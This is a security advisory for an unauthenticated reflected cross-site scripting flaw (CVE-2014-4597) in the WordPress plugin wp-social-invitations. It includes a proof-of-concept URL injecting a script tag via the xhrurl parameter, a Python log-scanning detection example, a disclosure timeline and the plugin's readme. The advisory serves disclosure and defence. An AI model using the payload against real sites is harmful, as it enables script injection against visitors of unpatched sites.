wp-plugin : wp-social-invitations

Plugin Details
Plugin Name: wp-plugin : wp-social-invitations
Affected Version : 1.4.4.2 (and most probably lower versions, if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC (Proof of Concept) :

http://127.0.0.1/wordpress/wp-content/wp-plugs/wp-social-invitations/test.php?xhrurl=xhrurl%27%3E%3Cscript%3Ealert%282%29%3C/script%3E

Vulnerable Parameter : xhrurl

Trac ChangeLog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=848497%40wp-social-invitations&old=829444%40wp-social-invitations&sfp_email=&sfph_mail=#file239
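The following Python is an added example, not code from the advisory or the plugin: it decodes the PoC above to show the value that reaches the page, then applies a simple detection rule (flag requests to the plugin's test.php whose decoded xhrurl value contains quote or angle-bracket characters) over constructed access-log lines. The Apache combined log format and the sample entries are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# PoC URL as published in the advisory (loopback host).
POC_URL = ("http://127.0.0.1/wordpress/wp-content/wp-plugs/wp-social-invitations/"
           "test.php?xhrurl=xhrurl%27%3E%3Cscript%3Ealert%282%29%3C/script%3E")

# Characters that let a reflected value leave an attribute or tag context.
ATTR_BREAKOUT = re.compile(r"""['"<>]""")

# Apache combined-format request field (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode_xhrurl(url: str) -> str:
    """Return the decoded xhrurl query value from a request URL ('' if absent)."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("xhrurl", [""])[0]

def is_suspicious_request(target: str) -> bool:
    """Flag requests to the plugin's test.php whose xhrurl carries HTML metacharacters."""
    if not urlsplit(target).path.endswith("/wp-social-invitations/test.php"):
        return False
    return bool(ATTR_BREAKOUT.search(decode_xhrurl(target)))

def scan_log(text: str) -> list:
    """Return the request targets of log lines that match the detection rule."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m and is_suspicious_request(m.group(1)):
            hits.append(m.group(1))
    return hits

# Constructed sample log lines: the PoC request, a benign call, and an unrelated search.
SAMPLE_LOG = """\
198.51.100.7 - - [28/May/2014:10:00:01 +0000] "GET /wordpress/wp-content/wp-plugs/wp-social-invitations/test.php?xhrurl=xhrurl%27%3E%3Cscript%3Ealert%282%29%3C/script%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.8 - - [28/May/2014:10:00:05 +0000] "GET /wordpress/wp-content/wp-plugs/wp-social-invitations/test.php?xhrurl=http%3A%2F%2Fexample.com%2Fcallback HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [28/May/2014:10:00:09 +0000] "GET /wordpress/?s=%3Cscript%3E HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    print(decode_xhrurl(POC_URL))  # xhrurl'><script>alert(2)</script>
    for hit in scan_log(SAMPLE_LOG):
        print("suspicious:", hit)
```

The same rule can be expressed as a web application firewall or log-search filter on the test.php path and the decoded xhrurl value; a fixed plugin version should render the parameter with attribute escaping so such input is inert.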


Disclosure Timeline
Vendor Contacted : 2014-01-21
Plugin Status : Updated on 2014-01-30
Public Disclosure : May 28, 2014
CVE Number : CVE-2014-4597
Plugin Description :
Allow your visitors to invite friends of their social networks such as Facebook, Twitter, Foursquare, Google, Yahoo, Hotmail and more directly into your Wordpress site. This plugin works perfectly with Buddypress and Invite Anyone Plugin. Check the [wsi demo](http://wp.timersys.com/wordpress-social-invitations/?utm_source=wsi-free&utm_medium=readme&utm_campaign=wsi). Full documentation available in [our site](http://wp.timersys.com/wordpress-social-invitations/docs/?utm_source=wsi-free&utm_medium=readme&utm_campaign=wsi)

= Currently Supported Providers =
Facebook, Twitter, Linkedin, Foursquare, Yahoo, Live, Gmail

= Features =
* HTML emails
* Template system to edit visuals or add your branding
* Invitations Queue to handle the different API limits
* Sidebar widget for sidebars
* Predefined invitation messages
* Custom CSS
* Translation ready
* Documentation

= Premium version =
* Content locker - Share your content only to users that invited their friends by using a simple shortcode
* MyCRED & Cubepoints integration
* Bypass registration lock - To use the plugin on private sites that work with invitation only
* Facebook uses SEND DIALOG
* Linkedin delivers private messages instead of posting into user status
* Twitter delivers Private messages instead of posting a tweet
* GMAIL & SMTP SUPPORT
* Predefined invitations can't be edited by users
* Redirect users after they send invitations
* Change order of providers
* Free Support

Get the premium version on [http://wp.timersys.com/wordpress-social-invitations/](http://wp.timersys.com/wordpress-social-invitations/?utm_source=wsi-free&utm_medium=readme&utm_campaign=wsi)

= Translations Credits =
* Spanish - Eruedados Colombia
* Serbo/Croatian - Borisa Djuraskovic